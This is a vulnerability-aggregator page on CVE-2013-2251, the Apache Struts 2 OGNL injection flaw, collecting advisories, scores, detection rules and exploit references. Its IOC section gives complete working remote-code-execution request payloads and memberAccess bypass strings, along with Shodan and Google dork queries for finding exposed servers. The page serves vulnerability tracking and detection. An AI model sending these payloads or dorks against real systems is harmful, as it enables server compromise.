CVE-2013-2251
published 2013-07-20CVE-2013-2251: Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
100.00%
100.0th percentile
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | archiva | — | — |
| apache | archiva | — | — |
| apache | archiva | >= 1.3 < 1.3.8 | 1.3.8 |
| apache | struts | 2.0.0 – 2.3.15 | — |
| cisco | products | — | — |
| fujitsu | interstage_business_process_manager_analytics | — | — |
| fujitsu | interstage_business_process_manager_analytics | — | — |
| oracle | siebel_apps_e-billing | — | — |
| oracle | siebel_apps_e-billing | — | — |
| oracle | siebel_apps_e-billing | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}↗
url/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}↗
url/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}↗
url/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}↗
url/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}↗
commandredirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','<cmd>'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}↗
command%{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}↗
command%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}↗
yara↗
regex: ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)- →Alert on HTTP responses with status 302 where the Location header reflects evaluated OGNL expression output (e.g., arithmetic results or file path strings), indicating successful OGNL injection via redirect: prefix. ↗
- →Use Shodan queries to identify exposed Apache Struts instances as potential targets: search for 'http.html:"apache struts"', 'http.title:"struts2 showcase"', or 'http.html:"struts problem report"'. ↗
- →Use Google dork 'ext:action | filetype:action' or 'intitle:"struts2 showcase"' to identify publicly exposed Struts 2 action endpoints. ↗
- →Monitor HTTP responses for uid/gid output patterns matching the regex ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\) in the response body, indicating successful OS command execution via OGNL injection. ↗
- →Flag HTTP requests to .action endpoints where query parameters contain URL-encoded OGNL constructs referencing 'ProcessBuilder', 'Runtime', 'getInputStream', or 'HttpServletResponse' — all hallmarks of this exploit's RCE payload. ↗
- →Detect attempts to bypass static method access restrictions in OGNL by monitoring for '#_memberAccess' manipulation patterns in HTTP parameters, including both property-level ('allowStaticMethodAccess') and object-replacement techniques. ↗
- ·The 'action:' prefix can only be used for exploitation if wildcard mapping is enabled in the Struts 2 configuration; 'redirect:' and 'redirectAction:' are not constrained by configuration and are universally exploitable on DefaultActionMapper. ↗
- ·All Struts 2 applications using DefaultActionMapper are vulnerable regardless of whether the application was designed to accept prefixed parameters, because prefixed parameters forcefully override application behavior. ↗
- ·After upgrading to the patched version, 'redirect:' and 'redirectAction:' parameters are completely dropped and no longer functional, which may cause compatibility issues for applications relying on these features. ↗
- ·The static method access bypass via '#_memberAccess["allowStaticMethodAccess"]=true' was patched in Struts 2.3.14.2, but alternative techniques (reflection-based or object replacement) remain viable in later vulnerable versions up to 2.3.15. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_cisco10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Apache Struts Improper Input Validation Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts Improper Input Validation Vulnerability
Vulnerability: Apache Struts Improper Input Validation Vulnerability
Affected: Apache Struts
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2013-2251
Remediation Due Date: 2022-04-15
Cisco
Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
vendor_cisco·2013-10-23·CVSS 10.0
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability.
The vulnerability is due to insufficient sanitization of user-supplied
input. An attacker could exploit this vulnerability by sending crafted requests
consisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An
exploit could allow the attacker to execute arbitrary code on the targeted system.
Cisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. Cisco Business Edition 3000 customers should contact their Cisco representative for available options.
Workarounds t
Cisco
Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
vendor_cisco
CVE-2013-2251 Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
CVE-2013-2251: Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability. The vulnerability is due to insufficient sanitization of user-supplied input. An attacker could exploit this vulnerability by sending crafted requests consisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An exploit could allow the attacker to execute arbitrary code on the targeted system. Cisco has released software updates that address this vulnerability for all the
CWE: CWE-20, CWE-20
Bug IDs: CSCui22841, CSCui33268, CSCui40582, CSCui22841, CSCui33268
OSV
Code injection in Apache Struts
osv·2022-05-13
CVE-2013-2251 [CRITICAL] Code injection in Apache Struts
Code injection in Apache Struts
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
GHSA
Code injection in Apache Struts
ghsa·2022-05-13
CVE-2013-2251 [CRITICAL] CWE-20 Code injection in Apache Struts
Code injection in Apache Struts
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
VulnCheck
Apache Struts Improper Input Validation Vulnerability
vulncheck·2013·CVSS 9.8
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts Improper Input Validation Vulnerability
Apache Struts Improper Input Validation Vulnerability
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.
Affected: Apache Struts
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://www.labs.greynoise.io/grimoire/2025-12-26-coldfusion/
Remediation Due: 2022-04-15
No detection rules found.
Exploit-DB
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
exploitdb·2020-10-20·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
---
# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
# Google Dork: ext:action | filetype:action
# Date: 2020/09/09
# Exploit Author: Jonatas Fil
# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
# Version: <= 2.3.15
# Tested on: Linux
# CVE : CVE-2013-2251
#!/usr/bin/python
#
# coding=utf-8
#
# Struts 2 DefaultActionMapper Exploit [S2-016]
# Interactive Shell for CVE-2013-2251
#
# The Struts 2 DefaultActionMapper supports a method for short-circuit
navigation state changes by prefixing parameters with
# "action:" or "redirect:", followed by a desired navigational target
expression. This mechanism was intended to help with
# attaching navigational information to
Exploit-DB
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
exploitdb·2014-01-14·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
Apache Struts2 2.0.0
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
...
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
As stated already, there are four
Exploit-DB
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)
exploitdb·2013-07-27
CVE-2013-2251 Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',
'Description' => %q{
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation
state changes by prefixing parameters with "action:" or "redirect:", followed by
a desired navigational target expression. This mechanism was intended to help with
attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15
Nuclei
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
nuclei·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.
Template:
id: CVE-2013-2251
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation,dwisiswant0,alex
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.
impact: |
This vulnerability can lead to rem
Metasploit
Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
metasploit
Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Threat Research Center
Threat Research
Vulnerabilities
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Bugzilla
CVE-2013-2251 Apache Struts 2 arbitrary OGNL code execution via crafted parameters
bugzilla·2013-07-19·CVSS 9.8
CVE-2013-2251 [CRITICAL] CVE-2013-2251 Apache Struts 2 arbitrary OGNL code execution via crafted parameters
CVE-2013-2251 Apache Struts 2 arbitrary OGNL code execution via crafted parameters
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
Upstream Advisory: http://struts.apache.org/release/2.3.x/docs/s2-016.html
Upstream bug: https://issues.apache.org/jira/browse/WW-4140
Upstr
http://archiva.apache.org/security.htmlhttp://cxsecurity.com/issue/WLB-2014010087http://osvdb.org/98445http://packetstormsecurity.com/files/159629/Apache-Struts-2-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2013/Oct/96http://seclists.org/oss-sec/2014/q1/89http://struts.apache.org/release/2.3.x/docs/s2-016.htmlhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.htmlhttp://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.htmlhttp://www.securityfocus.com/bid/61189http://www.securityfocus.com/bid/64758http://www.securitytracker.com/id/1029184http://www.securitytracker.com/id/1032916https://exchange.xforce.ibmcloud.com/vulnerabilities/90392http://archiva.apache.org/security.htmlhttp://cxsecurity.com/issue/WLB-2014010087http://osvdb.org/98445http://packetstormsecurity.com/files/159629/Apache-Struts-2-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2013/Oct/96http://seclists.org/oss-sec/2014/q1/89http://struts.apache.org/release/2.3.x/docs/s2-016.htmlhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.htmlhttp://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.htmlhttp://www.securityfocus.com/bid/61189http://www.securityfocus.com/bid/64758http://www.securitytracker.com/id/1029184http://www.securitytracker.com/id/1032916https://exchange.xforce.ibmcloud.com/vulnerabilities/90392https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2013-2251
2013-07-20
Published
2022-03-25
Added to CISA KEV
Exploited in the wild